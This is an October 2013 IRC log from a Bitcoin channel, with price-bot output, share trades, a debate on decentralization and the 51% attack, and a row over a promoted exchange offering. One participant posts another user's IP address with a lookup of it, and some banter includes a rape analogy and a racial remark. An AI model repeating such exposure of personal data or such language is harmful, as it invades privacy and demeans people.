stopped it. Oct 28 20:19:11 <kleeck> I can't deal with that level of fail. Oct 28 20:20:13 <dexX7> lol wtf **** BEGIN LOGGING AT Tue Oct 29 00:56:35 2013 Oct 29 00:56:45 <lurker> ;;market buy 50000 Oct 29 00:56:45 <gribble> This order would exceed the size of the order book. You would buy 37088.785 bitcoins, for a total of 6626978770.6762 USD and take the price to 99999999999.0000. | Data vintage: 107.4166 seconds Oct 29 00:56:51 <lurker> ;;market buy 40000 Oct 29 00:56:51 <gribble> This order would exceed the size of the order book. You would buy 37088.785 bitcoins, for a total of 6626978770.6762 USD and take the price to 99999999999.0000. | Data vintage: 113.4446 seconds Oct 29 00:56:58 <lurker> meh Oct 29 00:56:59 <pankkake> perhaps they'll buy DPR's coins! Oct 29 00:57:12 <lurker> no, Ripple! Oct 29 00:57:31 <pankkake> yeah, the advantage is that there is no shortage of them :p Oct 29 00:57:36 <mircea_popescu> lol Oct 29 00:57:42 <mircea_popescu> 37k all the btc left, srsly ? Oct 29 00:57:55 <lurker> print'em! Oct 29 00:58:35 <dexX7> here is a nice way to track the books: http://blockchained.com/depth_mtgox_15d.png Oct 29 00:59:14 <smickles> i might be here now Oct 29 01:00:07 <assbot> [HAVELOCK] [VTX] 16 @ 0.31501013 = 5.0402 BTC [-] {3} Oct 29 01:01:08 <assbot> [HAVELOCK] [VTX] 2 @ 0.31501012 = 0.63 BTC [-] {2} Oct 29 01:01:17 <dexX7> there is another really awesome graph i stumbled upon lately: http://coinsight.org/graphs/reddit_subscribers.png :D Oct 29 01:01:33 <pankkake> lol Oct 29 01:03:10 <assbot> [HAVELOCK] [VTX] 4 @ 0.31501009 = 1.26 BTC [-] {2} Oct 29 01:04:11 <assbot> [HAVELOCK] [VTX] 9 @ 0.31500016 = 2.835 BTC [-] Oct 29 01:05:06 <lurker> ;;ticker --market all Oct 29 01:05:18 <gribble> MtGox BTCUSD last: 207.99400, vol: 10505.75742485 | Bitstamp BTCUSD last: 195.37, vol: 12532.34495373 | BTC-E BTCUSD last: 188.88, vol: 8286.85443 | Bitfinex BTCUSD last: 195.85, vol: 3319.8770489 | CampBX BTCUSD last: 185.98, vol: 336.11482793 | Volume-weighted last average: 197.579214505 Oct 29 01:26:33 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00105014 = 0.105 BTC [-] {4} Oct 29 01:31:07 <ThickAsThieves> http://bitcoinmagazine.com/7798/decentralization-key-to-bitcoins-success/ Oct 29 01:31:24 <ThickAsThieves> decentralize all the things! Oct 29 01:37:12 <lurker> TAT: decentralization is essential. BTC enemy n°1 is centralization (51% yada yada) Oct 29 01:38:04 <pankkake> centralization is often misunderstood. for instance, mining isn't becoming centralized Oct 29 01:38:04 <lurker> BTC can't survive without being decentralized enough. Oct 29 01:38:43 <lurker> pankakke: it's being concentrated ATM Oct 29 01:39:02 <lurker> pankkake* sry :) Oct 29 01:39:16 <pankkake> I highlight all spellings :p Oct 29 01:39:42 <lurker> technically, it's not a spelling mistake since it's a name :P Oct 29 01:41:33 <Bugpowder> ThickAsThieves: Did you short your AM PTs all the way down? Oct 29 01:42:02 <Bugpowder> Looks like my call to short it at 1BTC would have been profitable, if I had pulled the trigged and not gotten stopped out. :-P Oct 29 01:43:11 <mircea_popescu> lurker how do you know all this ? Oct 29 01:45:53 <mircea_popescu> i mean "BTC can't survive without being decentralized enough". what's enough and how do you know ? Oct 29 01:48:45 <lurker> pandora's box Oct 29 01:48:56 <lurker> gimme a min :) Oct 29 01:49:55 <assbot> [HAVELOCK] [AM100] 877 @ 0.00501262 = 4.3961 BTC [-] {16} Oct 29 01:58:07 <lurker> mircea_popescu: there might be a way to attack this mathematically but I don't know if there is an exact answer to "how much". The extreme min. would be to have 2 trusted but untrusting miners. Oct 29 01:58:58 <lurker> However, that means a lot of centralization will have happened. Oct 29 01:59:30 <lurker> I can see this if these 2 miners are, say, banks, with lots of customers, all using bitcoin. Oct 29 01:59:45 <lurker> The problem is getting from where we are to there. Oct 29 02:01:40 <lurker> ATM, bitcoin survives on geek greediness and criminals. Oct 29 02:01:59 <lurker> They don't want centralization. Oct 29 02:06:11 <assbot> [HAVELOCK] [AM100] 195 @ 0.005 = 0.975 BTC [-] Oct 29 02:10:11 <lurker> If the winkelvoss types start "attacking" the bitcoin market, it will have the effect of a middlecoin on the latest scamcoin. Oct 29 02:12:49 <mircea_popescu> i think you're jumping to conclusions on very little data, and the shape of those conclusions is visibly more influenced by your own ideas of the world than the actual reality of the matter Oct 29 02:14:01 <lurker> you might be right, but it's gut feeling. Oct 29 02:14:31 <lurker> that's the kind of thing you "just know" but you can't put it into works (2 different parts of the brain) Oct 29 02:14:43 <lurker> words* Oct 29 02:15:13 <lurker> (and it's late - I'm not particularly articulate at this hour) Oct 29 02:16:12 <mircea_popescu> right. Oct 29 02:16:25 <lurker> anyway, the centralization/decentralizatio n"issue" in bitcoin always struck me as ironic. Oct 29 02:16:47 <mircea_popescu> why ? Oct 29 02:17:15 <lurker> the fact that there is a "51%" problem at all for a system based on trust/demand/decentralization Oct 29 02:17:40 <lurker> that means the weakness of bitcoin IS centralization Oct 29 02:19:54 <lurker> when you have centralization, you lose trust and without it you lose demand and value. Oct 29 02:20:39 <mircea_popescu> the system is not based on "trust/demand/decentralization". the system is based on the blockchain because it has to use some solution for the byzantyne problem once it's decentralised. Oct 29 02:20:53 <mircea_popescu> the 51% attack is a weakness of the particular solution used to implement decentralisation. Oct 29 02:21:06 <mircea_popescu> it' Oct 29 02:21:13 <mircea_popescu> s important to put these things in their right order. Oct 29 02:21:53 <lurker> decentralization/trust/demand Oct 29 02:22:04 <mircea_popescu> uh, not THOSE things. Oct 29 02:22:17 <mircea_popescu> those things are by and large irrelevant in this discussion. Oct 29 02:22:38 <lurker> hmmmm Oct 29 02:22:54 <mircea_popescu> looky here. you decide to make a system. next step, is to decide whether it shall be centralised or decentralised. Oct 29 02:23:06 <lurker> are we talking markets or technology? Oct 29 02:23:10 <mircea_popescu> if you take the former, you can asume the implementation is friendly. Oct 29 02:23:24 <mircea_popescu> if you take the latter, you can't so asume. the implementation has to be somehow forced to stick to the design Oct 29 02:24:21 <lurker> ripple is friendly? Oct 29 02:24:27 <mircea_popescu> the particular way bitcoin forces this is through the blockchain. Oct 29 02:24:40 <mircea_popescu> friendly to the design, not friendly to you. Oct 29 02:24:48 <mircea_popescu> (design) ? (implementation) Oct 29 02:25:24 <lurker> back to my earlier questions: are you discussing technology or market (money)? Oct 29 02:25:49 <mircea_popescu> this distinction doesn't work in bitcoin as you'd expect. Oct 29 02:26:23 <lurker> you're right, and wrong. Oct 29 02:26:36 <mircea_popescu> anyway, a very simple example to understand what i mean : suppose the law says nobody may search your house without a warrant. Oct 29 02:26:52 <mircea_popescu> what makes the actual cop at your door (implementation) follow this principle (design) ? Oct 29 02:27:16 <mircea_popescu> in a centralised system, the assumption is that the implementation is friendly to the design, and the cop will do what the fuck the law says he should do. Oct 29 02:27:33 <mircea_popescu> as the implementation becomes less centralised (for instance through the workings of democracy, and lawmakers pushing agendas etc), Oct 29 02:27:34 <lurker> I'm crystal on your meaning, no sweat. Oct 29 02:27:38 <mircea_popescu> the cop of today can't be so trusted. Oct 29 02:30:14 <lurker> It comes down to the same thing: can you be sure that system is doing what you expect it to? (= do you trust the system) Oct 29 02:30:53 <mircea_popescu> yes, it does. being happy always boils down to 1. identify what to do to be happy and 2. doing that. Oct 29 02:31:36 <lurker> Trust is what the blockcahin builds. Oct 29 02:32:37 <assbot> [HAVELOCK] [VTX] 1 @ 0.31500016 BTC [-] Oct 29 02:32:39 <lurker> Many miners (many copies of the blockchain) builds trust in the blockchain itself. Oct 29 02:32:52 <lurker> kind of a quorum. Oct 29 02:33:18 <lurker> or quanta, à la gold value. Oct 29 02:33:47 <lurker> Then comes demand for the quanta and that creates value. Oct 29 02:34:04 <asciilifeform> lurker: L. Lamport. "The Byzantine Generals Problem." Oct 29 02:34:06 <asciilifeform> http://www.cs.cornell.edu/courses/cs614/2004sp/papers/lsp82.pdf Oct 29 02:34:32 <asciilifeform> read and then come back... Oct 29 02:35:43 <asciilifeform> (and then he'll come back and ask why 51% attack in btc, and not a 67% attack. and it'll be fair.) Oct 29 02:36:37 <mircea_popescu> for that matter, demand does not create value. value creates demand. Oct 29 02:36:54 <mircea_popescu> this is why the qe does not improve the position of the us. Oct 29 02:37:22 <lurker> asciilifeform: I'm not looking at it from the technology standpoint. Oct 29 02:38:10 <lurker> mircea_popescu: chicken or egg? Oct 29 02:38:30 <lurker> you can't have value before you have demand. Oct 29 02:38:37 <asciilifeform> lurker: unless you know the theoretical limits of the tech, you're stuck pontificating. Oct 29 02:39:21 <asciilifeform> sorta like people who ponder solutions to energy crisis without ever having heard of thermodynamical laws, the carnot engine, etc. Oct 29 02:39:22 <mircea_popescu> in a sense, the tech creates the ontological limits of the discourse. this is not visible as much in "classical" applications, because somehow it's obvious that your particular abilities to deal with weak nuclear force are involved. Oct 29 02:39:41 <mircea_popescu> but in more advanced applications, there's little way to distinguish between "tech" and "the rules of the world" Oct 29 02:40:18 <lurker> OK, so what, for you, creates the value of bitcoin? Oct 29 02:40:36 <mircea_popescu> the fact that it gives better answers to several classes of problems Oct 29 02:40:46 <mircea_popescu> http://trilema.com/category/bitcoin/ Oct 29 02:40:47 <ozbot> Bitcoin pe Trilema - Un blog de Mircea Popescu. Oct 29 02:40:54 <mircea_popescu> read through there, i've written out many cases. Oct 29 02:45:03 <VanCleef> bitcoin is a new global scam tho Oct 29 02:46:30 <lurker> mircea_popescu: I don't see anything that would put value before demand. Oct 29 02:46:44 <mircea_popescu> VanCleef you're not even kidding, i get a lot of (mostly, older, mostly white, mostly male, republican types) very indignant at how they knoiw btc to be a scam Oct 29 02:47:23 <asciilifeform> has nobody ever heard of 'hawala'? Oct 29 02:47:49 <asciilifeform> they've been doing 'bitcoin' since the caliphs. Oct 29 02:49:27 <mircea_popescu> and they had a pretty good solution for the byzantine generals, rtoo. Oct 29 02:52:42 <VanCleef> it is a scam Oct 29 02:52:49 <VanCleef> looking at what happening to mining Oct 29 02:52:56 <dexX7> hey asciilifeform, do you have a blog or something similar, too? it's not the first time i see you posting something interesting Oct 29 02:52:56 <VanCleef> taking satoshi to court over this Oct 29 02:53:17 <asciilifeform> dexX7: sure. 'loper-os.org'. Oct 29 02:53:38 <dexX7> ah ty Oct 29 02:54:57 <asciilifeform> VanCleef: say you're trying to catch a bus, and run late. you run after it, and jump, don't quite make it, fall into traffic. the end. buses are a scam? Oct 29 02:56:57 <mircea_popescu> yes. Oct 29 02:57:00 <mircea_popescu> definitely. Oct 29 02:57:18 <VanCleef> what do buses have to do with scamming people out of money? Oct 29 02:57:34 <VanCleef> catching a bus isn't involving yourself with a pyramid scheme Oct 29 03:00:14 <lurker> asciilifeform/mircea_popescu: bitcoin is a bus. do you care what engine it has? (on this, night night / arrevedere) Oct 29 03:01:34 <VanCleef> think of it more like this Oct 29 03:02:06 <VanCleef> say you spent 100grand on a bus ticket right and instead of the bus driver picking you up he crashes into your living room and starts raping your grandmother Oct 29 03:02:17 <VanCleef> you wouldn't get a bit upset? Oct 29 03:02:59 <skinnkavaj> Anyone here remember what price Litecoinglobal shares was at launch? Oct 29 03:03:16 <asciilifeform> VanCleef: are you thinking of something other than the difficulty increase? Oct 29 03:03:30 <asciilifeform> because the latter is in no way a surprise Oct 29 03:07:08 <mircea_popescu> perhaps a surprise in degree, but certainly not in kind Oct 29 03:09:50 <Kleeck_> who runs litecoinglobal? Oct 29 03:09:53 <Kleeck_> not burnside, I take it Oct 29 03:10:03 <dexX7> he did Oct 29 03:10:16 <Kleeck_> he sold it? Oct 29 03:10:30 <dexX7> hm? Oct 29 03:10:37 <dexX7> he was the admin there the whole time Oct 29 03:11:04 <Kleeck_> I was told that the site was coming back into operation? Oct 29 03:11:11 <Kleeck_> Maybe I was ill informed. Oct 29 03:12:06 <dexX7> ah, i think you mistake it with www.litecoininvest.com? Oct 29 03:34:38 <assbot> [HAVELOCK] [AM100] 23 @ 0.00501 = 0.1152 BTC [+] Oct 29 03:44:43 <samson_> !dgc Oct 29 03:46:45 <samson_> !offline Oct 29 03:46:59 <samson_> oops - sorry - wrong channel Oct 29 03:50:33 <KRS1> hi Oct 29 04:09:48 <mircea_popescu> “There is a cult of ignorance in the United States, and there has always been. The strain of anti-intellectualism has been a constant thread winding its way through our political and cultural life, nurtured by the false notion that democracy means that “my ignorance is just as good as your knowledge.” Oct 29 04:09:54 <mircea_popescu> let's play guess the author Oct 29 04:10:08 <asciilifeform> naggum? Oct 29 04:11:02 <mircea_popescu> hehe nope. sci fi guy. Oct 29 04:11:30 <asciilifeform> heinlein? Oct 29 04:11:39 <mircea_popescu> nope. Oct 29 04:17:20 <KRS1> my god people you have google and you still get it wrong Oct 29 04:19:59 <nubbins`> foundation, good books Oct 29 04:21:18 <mircea_popescu> yeh Oct 29 04:49:35 <dub> chopra? Oct 29 04:53:15 <mircea_popescu> chopra ? Oct 29 05:04:41 <dub> deepak Oct 29 05:09:45 <mircea_popescu> nah. Oct 29 05:21:23 <assbot> [HAVELOCK] [AM100] 133 @ 0.00534938 = 0.7115 BTC [-] Oct 29 05:48:50 <assbot> [HAVELOCK] [AM1] 5 @ 0.59999 = 3 BTC [+] Oct 29 05:51:53 <assbot> [HAVELOCK] [AM1] 1 @ 0.6 BTC [+] Oct 29 06:39:07 <nubbins`> http://imgur.com/Lu5cWik Oct 29 06:39:07 <ozbot> imgur: the simple image sharer Oct 29 06:39:15 <nubbins`> from the next zine we're publishing Oct 29 06:39:42 <nubbins`> his face makes me feel funny :( Oct 29 07:16:16 <assbot> [HAVELOCK] [LABCO] 250 @ 0.00045003 = 0.1125 BTC [-] Oct 29 07:18:18 <assbot> [HAVELOCK] [AM100] 200 @ 0.00534938 = 1.0699 BTC [-] {4} Oct 29 07:21:08 <mircea_popescu> http://trilema.com/2013/the-perfect-escrow/ << wanna hear opinions Oct 29 07:21:09 <ozbot> The perfect escrow pe Trilema - Un blog de Mircea Popescu. Oct 29 07:37:37 <assbot> [HAVELOCK] [AM100] 59 @ 0.00535 = 0.3157 BTC [+] **** BEGIN LOGGING AT Tue Oct 29 18:51:15 2013 Oct 29 18:54:16 <kleeck> So mcxNOW is MPex's new exchange, right? Oct 29 18:55:23 <mircea_popescu> mnope Oct 29 18:55:45 <assbot> [HAVELOCK] [B] [XBOND] 1419 @ 0.00110734 = 1.5713 BTC [-] {2} Oct 29 18:57:47 <assbot> [HAVELOCK] [CBTC] 6992 @ 0.00018 = 1.2586 BTC [+] Oct 29 19:02:51 <assbot> [HAVELOCK] [AM100] 300 @ 0.005339 = 1.6017 BTC [-] Oct 29 19:04:53 <assbot> [HAVELOCK] [B] [XBOND] 362 @ 0.00110998 = 0.4018 BTC [+] Oct 29 19:06:55 <assbot> [HAVELOCK] [B] [XBOND] 3000 @ 0.00105235 = 3.1571 BTC [-] {15} Oct 29 19:15:47 <jurov> thx kakobrekla looks like i need this Oct 29 19:16:53 <kakobrekla> you gonna try it out? Oct 29 19:18:06 <assbot> [HAVELOCK] [AM100] 772 @ 0.005339 = 4.1217 BTC [-] {3} Oct 29 19:23:11 <assbot> [HAVELOCK] [AM100] 244 @ 0.00538815 = 1.3147 BTC [+] {3} Oct 29 19:24:12 <assbot> [HAVELOCK] [AM100] 30 @ 0.005498 = 0.1649 BTC [+] Oct 29 19:25:13 <assbot> [HAVELOCK] [B] [XBOND] 300 @ 0.00109783 = 0.3293 BTC [+] {3} Oct 29 19:28:51 <Andiz> ;;ticker Oct 29 19:28:53 <gribble> MtGox BTCUSD ticker | Best bid: 212.31211, Best ask: 212.50000, Bid-ask spread: 0.18789, Last trade: 212.50000, 24 hour volume: 9662.27925930, 24 hour low: 204.02000, 24 hour high: 214.76999, 24 hour vwap: 209.02524 Oct 29 19:36:26 <jurov> http://www.reddit.com/r/Bitcoin/comments/1pgwsr/my_94_year_old_grandmother_gave_me_1000_dollars/ Oct 29 19:36:36 <jurov> "blow stamps" i like this! Oct 29 19:39:04 <kakobrekla> lol Oct 29 19:49:10 <mircea_popescu> dude with all these crashed raids, i now have the bitcoin/usd rate from unixtime 45788995934578218 Oct 29 19:49:18 <mircea_popescu> which we could say is in the future. Oct 29 19:49:30 <mircea_popescu> also from time 478, and also 0, and even before that. Oct 29 19:51:29 <dexX7> bye last safe harbor, that's the end of bitcoin finance Oct 29 19:52:01 <kleeck> lol Oct 29 19:54:04 <mircea_popescu> I HAVE TEH KNOWLEDGE Oct 29 19:54:25 <mircea_popescu> next time someone asks me how i know all this shit ima be all like "dude... my raids crashed". Oct 29 19:56:20 <pankkake> the dog ate my homework Oct 29 20:01:50 <assbot> [HAVELOCK] [AM1] 1 @ 0.61 BTC [+] Oct 29 20:06:55 <assbot> [HAVELOCK] [CBTC] 13892 @ 0.00018 = 2.5006 BTC [+] {4} Oct 29 20:07:56 <assbot> [HAVELOCK] [AM1] 1 @ 0.63 BTC [+] Oct 29 20:11:08 <KRS1-> what is the price in the future Oct 29 20:11:21 <KRS1-> drumroll.. Oct 29 20:12:00 <KRS1-> Current title: The Sundays - Wild Horses Oct 29 20:13:01 <assbot> [HAVELOCK] [KCIM] 1 @ 0.35 BTC [-] Oct 29 20:13:08 <mircea_popescu> i could share that for the low low price of 4506982753094509 btc Oct 29 20:15:07 <KRS1-> ah come on really Oct 29 20:15:37 <KRS1-> I think you got your decimal point in the wrong place, FOO Oct 29 20:16:06 <mircea_popescu> my system uses decimal curly braces Oct 29 20:16:08 <mircea_popescu> so a foo is yoo Oct 29 20:18:19 <KRS1-> funny how some of the world uses commmmmmmmmmmmmas Oct 29 20:18:32 <KRS1-> oops...commas Oct 29 20:26:14 <assbot> [HAVELOCK] [NEOBEE] 226 @ 0.00262104 = 0.5924 BTC [-] {4} Oct 29 20:27:15 <assbot> [HAVELOCK] [NEOBEE] 1974 @ 0.0026 = 5.1324 BTC [-] Oct 29 21:14:00 <assbot> [HAVELOCK] [AM1] 1 @ 0.64 BTC [+] Oct 29 21:22:08 <assbot> [HAVELOCK] [AM1] 4 @ 0.65089997 = 2.6036 BTC [+] {2} Oct 29 21:57:20 <kakobrekla> http://istruecryptauditedyet.com/ Oct 29 21:57:21 <ozbot> Is TrueCrypt Audited Yet? Oct 29 21:57:23 <kakobrekla> you see this Oct 29 21:57:36 <kakobrekla> we need isbitcoindocumentationwrittenyet.com Oct 29 21:57:44 <kakobrekla> or specification Oct 29 21:57:52 <kakobrekla> a better word. Oct 29 21:59:14 <kakobrekla> any takers? Oct 29 22:02:17 <smickles> o/ I can not-do that Oct 29 22:02:35 <kakobrekla> which part Oct 29 22:03:51 <smickles> writing documentation Oct 29 22:04:06 <mircea_popescu> kakobrekla lol srsly. Oct 29 22:04:14 <mircea_popescu> and since we're on it, i must spam http://trilema.com/2013/the-perfect-escrow/ Oct 29 22:06:44 <kakobrekla> no srsly ill look into getting someone who writes good docu Oct 29 22:06:50 <smickles> 91? Oct 29 22:06:52 <kakobrekla> and ask how much would it cost Oct 29 22:06:58 <kakobrekla> to have the thing done Oct 29 22:07:10 <kakobrekla> and talk to the devs to make it right Oct 29 22:07:14 <kakobrekla> in the process Oct 29 22:07:23 <kakobrekla> how bad could it fail1? Oct 29 22:07:31 <smickles> wow, kakobrekla doing good for the community Oct 29 22:08:04 <smickles> i just didn't expect it with such a long url joke-seeming things Oct 29 22:08:05 <nubbins`> worst allergy attack of my life Oct 29 22:08:12 <nubbins`> 4.5 hours and counting Oct 29 22:08:23 <kakobrekla> smickles big problem needs long url. Oct 29 22:08:32 <kakobrekla> you prolly have a low amount of phone number too! Oct 29 22:11:42 <nubbins`> heh Oct 29 22:12:30 <mircea_popescu> lmao a large amount of url! Oct 29 22:12:46 <mircea_popescu> kakobrekla i had asked 3 different people so far, which all promised they're going to do it. Oct 29 22:12:57 <mircea_popescu> over the past maybe 1year give or take. Oct 29 22:13:06 <kakobrekla> for pay ofc? Oct 29 22:13:19 <mircea_popescu> as long as it's reasonable. Oct 29 22:13:38 <mircea_popescu> im not about to pay $100 an hour for 9400 hours or w/e Oct 29 22:13:55 <kakobrekla> yeah im trying to get a quote. Oct 29 22:14:07 <mircea_popescu> the catch of course is that it has to be good. Oct 29 22:14:29 <mircea_popescu> otherwise sure, get some odesk kid with credentials of having worked for labcoin or bitfinex or w/e Oct 29 22:14:46 <kakobrekla> no no that . Oct 29 22:15:00 <kakobrekla> im not even considering some random dude Oct 29 22:15:01 <assbot> [HAVELOCK] [AM1] 20 @ 0.65099999 = 13.02 BTC [+] {3} Oct 29 22:15:09 <mircea_popescu> right. Oct 29 22:16:54 <nubbins`> good documentation is a rare beast Oct 29 22:21:07 <assbot> [HAVELOCK] [AM1] 5 @ 0.65799996 = 3.29 BTC [+] {2} Oct 29 22:22:08 <assbot> [HAVELOCK] [AM100] 200 @ 0.00565887 = 1.1318 BTC [+] {7} Oct 29 22:24:13 <kleeck> .d Oct 29 22:24:13 <ozbot> 390928787.63809 | Next Diff in 1377 blocks | Estimated Change: 18.4814% in 7d 18h 56m 25s Oct 29 22:27:13 <assbot> [HAVELOCK] [AM100] 69 @ 0.00569499 = 0.393 BTC [+] Oct 29 22:45:38 <bidji> Do you remember the mcxNOW IPO i talked abour earlier? Oct 29 22:45:56 <bidji> They already raised 1 Million dollar! Oct 29 22:46:00 <bidji> In like 12 hours Oct 29 22:46:21 <bidji> https://mcxnow.com/buymcx.html With a big Meter updated in Real-time! Oct 29 22:46:21 <ozbot> mcxNOW - Buy mcxFEE Oct 29 22:47:55 <kakobrekla> if i reckon, the guy is in merrica. Oct 29 22:51:36 <assbot> [HAVELOCK] [AM1] 1 @ 0.67 BTC [+] Oct 29 22:53:01 <dexX7> hm i would almost bet that there were ~33358 shares remaining 8 hours ago, too... Oct 29 22:53:38 <assbot> [HAVELOCK] [AM100] 100 @ 0.00575371 = 0.5754 BTC [+] {5} Oct 29 22:53:53 <kakobrekla> so he sold 1 share? Oct 29 22:54:04 <dexX7> :D Oct 29 22:54:53 <bidji> no , there was 45 000 share left 12-13 hours ago Oct 29 22:54:55 <dexX7> but anyway, i never traded on that website, but it feels soo smooth and fast *_* (i'm serious) Oct 29 22:55:02 <bidji> he sold 12,000 Oct 29 22:55:21 <kakobrekla> i lold when reading teh footer Oct 29 22:55:39 <dexX7> hehe yea Oct 29 22:55:45 <kakobrekla> you can see immediately its some retarded kid. Oct 29 22:56:25 <dexX7> maybe. and now he is cashing out Oct 29 22:56:38 <bidji> well, the guy have 15+ year experience in c++. Oct 29 22:56:46 <dub> but he has Experience (tm) Oct 29 22:57:02 <bidji> Just test the site, you'll see it's not coded in a weeks Oct 29 22:57:19 <bidji> Faster than any other exchange, just try Oct 29 22:57:24 <dub> how much is he paying you to ruin your rep shilling for it? Oct 29 22:57:33 <kakobrekla> 1 sher per 12 hrs it seems Oct 29 22:57:37 <kakobrekla> share Oct 29 22:57:51 <dexX7> i think trading is locked atm Oct 29 22:58:07 <bidji> Only the trading of the mcxFEE, you can trade Altcoin Oct 29 22:58:11 <dexX7> so the market doesn't crash due to (potentially) 10x additional shares Oct 29 22:58:16 <dexX7> *9x Oct 29 22:58:39 <kakobrekla> bidji you know you can just come in here and claim some shit and expect everybody to go along Oct 29 22:58:43 <assbot> [HAVELOCK] [AM1] 36 @ 0.6301 = 22.6836 BTC [-] {3} Oct 29 22:58:57 <bidji> that's why i suggest you test it Oct 29 22:59:08 <kakobrekla> thats why i suggest you shut the fuck up and lurk moar Oct 29 22:59:20 <dub> ^ Oct 29 22:59:39 <bidji> People are investing 1 million$ in the site, maybe they know what they are doing don't you think Oct 29 22:59:47 <kakobrekla> maybe Oct 29 22:59:47 <bidji> they did the math Oct 29 22:59:47 <dub> no Oct 29 22:59:48 <kakobrekla> prolly not. Oct 29 23:00:17 <nubbins`> nope Oct 29 23:00:43 <bidji> i did the math : https://docs.google.com/spreadsheet/ccc?key=0AioqMMSVIC5tdFplWndsdmZuaGxyN01xemxtNWYxVGc#gid=0 Oct 29 23:00:51 <bidji> 10% yield at current volume Oct 29 23:00:57 <bidji> And it's growing very fast Oct 29 23:01:28 <bidji> There is 2000 BTC trading volume each day Oct 29 23:01:51 <bidji> Just want to spread awareness Oct 29 23:01:59 <kakobrekla> well thank you so much for exposing another scam now lets move along. Oct 29 23:03:53 <bidji> Good luck with your investment, i'm happy with mine and wanted to share Oct 29 23:04:01 <imsaguy> why would you share? Oct 29 23:04:10 <imsaguy> if you're making so much money, you'd want to keep it a secret Oct 29 23:04:13 <imsaguy> and make even more money Oct 29 23:04:23 <kakobrekla> we fools are gonna buy in later. Oct 29 23:04:34 <bidji> Because it's in my interest. More people on the site, more growth Oct 29 23:04:37 <imsaguy> I like being the last person to hold the bag Oct 29 23:04:47 <kakobrekla> o o i smell pony! Oct 29 23:04:54 <kakobrekla> must be the manure. Oct 29 23:04:58 <imsaguy> don't you feel like a pony when you sweat? Oct 29 23:04:59 <Apocalyptic> *poni Oct 29 23:05:27 <bidji> You realise it's share in a trading exchange? So more people on it, more fee revenue. Simple as that Oct 29 23:06:00 <kakobrekla> i think thats too much for my math skills, do i have to divide by 0? Oct 29 23:06:13 <imsaguy> I just round up Oct 29 23:06:23 <smickles> i feel like someone is trying to sell chocolate on the front lawn of hersheys Oct 29 23:06:24 <imsaguy> 0/0=1 Oct 29 23:06:34 <smickles> (sp?) Oct 29 23:06:51 <kakobrekla> oh yeah that makes sense well sign me up for 2 shares! no, make it 3! Oct 29 23:07:06 <imsaguy> whenever the divisor = the numerator, the product equals one. Oct 29 23:07:11 <smickles> $vwap mpoe Oct 29 23:07:13 <mpexbot> smickles: An error has occurred and has been logged. Please contact this bot's administrator for more information. Oct 29 23:07:17 <smickles> shit Oct 29 23:07:22 <mircea_popescu> http://trilema.com/2013/the-horror-of-horrors/ mpex status etc Oct 29 23:07:23 <ozbot> The horror of horrors pe Trilema - Un blog de Mircea Popescu. Oct 29 23:07:26 <mircea_popescu> jurov ^ Oct 29 23:07:42 <imsaguy> smickles, mpex is migrating to the 50btc platform Oct 29 23:07:56 <mircea_popescu> da fuck is that Oct 29 23:08:13 <imsaguy> "we got 'hacked' and stole all of your money" platform. Oct 29 23:08:16 <dexX7> happy birthday Oct 29 23:08:48 <imsaguy> every day is a birthday Oct 29 23:10:21 <mircea_popescu> dub bidiji (51403667@gateway/web/freenode/ip.81.64.54.103) has a reputation to ruin now ? Oct 29 23:10:26 <mircea_popescu> imsaguy hater! Oct 29 23:10:38 <imsaguy> mircea_popescu: at least I'm equal opportunity with my hating. Oct 29 23:11:03 <mircea_popescu> do you hate obama ? Oct 29 23:11:19 <imsaguy> He's like 7/16 black, of course. Oct 29 23:11:35 <mircea_popescu> cute kittens with tits ? Oct 29 23:11:40 <smickles> obama stopped the recording of wizard history Oct 29 23:11:45 <imsaguy> kittens dont have tits. Oct 29 23:11:55 <mircea_popescu> caramel and whiskey tits! Oct 29 23:11:56 <imsaguy> good try though. Oct 29 23:12:34 <mircea_popescu> dude actually a cat that had nice tits which sprouted whiskey and caramel would make a great pet. Oct 29 23:12:34 <smickles> http://user.xmission.com/~emailbox/images/lioncut.jpg Oct 29 23:12:37 <imsaguy> at least this happened: http://news.msn.com/crime-justice/ex-congressman-jackson-reports-to-prison Oct 29 23:12:58 <imsaguy> smickles, that's a cat, not a kitten. Oct 29 23:13:25 <mircea_popescu> jesse jackson ? wow. Oct 29 23:13:32 <imsaguy> the junior Oct 29 23:13:38 <imsaguy> the senior is still spouting his bullshit. Oct 29 23:13:41 <mircea_popescu> a a ok Oct 29 23:14:40 <imsaguy> stupid split Oct 29 23:15:44 <mircea_popescu> His wife spent $5,150 on fur capes and parkas, the document said. Oct 29 23:15:49 <mircea_popescu> where the fuck did she find a 5k fur cape Oct 29 23:15:52 <mircea_popescu> sounds like nutria Oct 29 23:16:39 <mircea_popescu> o hey, check it out : the c++ experience guy also relays. http://blockchain.info/ip-address/81.64.54.103 Oct 29 23:17:11 <imsaguy> probably a tor exit node or something Oct 29 23:17:22 <mircea_popescu> nah Oct 29 23:18:14 <mircea_popescu> http://news.msn.com/crime-justice/doctors-mistress-takes-the-stand-in-murder-case Oct 29 23:18:14 <ozbot> Doctor's mistress takes the stand in murder case Oct 29 23:18:18 <mircea_popescu> girl's name is gypsy milles Oct 29 23:18:27 <mircea_popescu> willis* Oct 29 23:21:13 <dub> mircea_popescu: so were intersango handling your backups? Oct 29 23:21:32 <mircea_popescu> no, i just had the dubious idea of having the proxies make something sort of like a blockchain Oct 29 23:21:40 <mircea_popescu> and i can't add to it. Oct 29 23:26:04 <mircea_popescu> dexX7 ty Oct 29 23:29:12 <dub> I thought I'd worked with some incompetent motherfuckers before Oct 29 23:30:16 <assbot> [HAVELOCK] [AM100] 20 @ 0.00569499 = 0.1139 BTC [-] Oct 29 23:38:59 <dub> that wasnt reference to mpex btw Oct 29 23:39:14 <dub> raging at my new work environment Oct 29 23:40:37 <mircea_popescu> at least they dion't allocate 5mb of random data for you with the task to read through it and find "anything suspicious" Oct 29 23:44:18 <orkaa> mircea_popescu, something for you Oct 29 23:44:20 <orkaa> http://www.youtube.com/watch?v=j6W2I--r3PY Oct 29 23:44:20 <ozbot> Eminem Welcome to Timisoara City (Romania) - YouTube Oct 29 23:44:47 <pankkake> wat Oct 29 23:47:09 <dub> wow Oct 29 23:47:19 <dub> Romania's got talent Oct 29 23:51:18 <mircea_popescu> ha Oct 29 23:51:58 <mircea_popescu> ahahaha her romanian accent is so thick Oct 29 23:53:45 <mircea_popescu> anyway, it's definitely in timisoara. Oct 29 23:55:53 <mircea_popescu> http://www.youtube.com/watch?v=aT85qnGSFeI she's got moar. Oct 29 23:55:54 <ozbot> Eminem Still Dre & Em (Funny) - YouTube 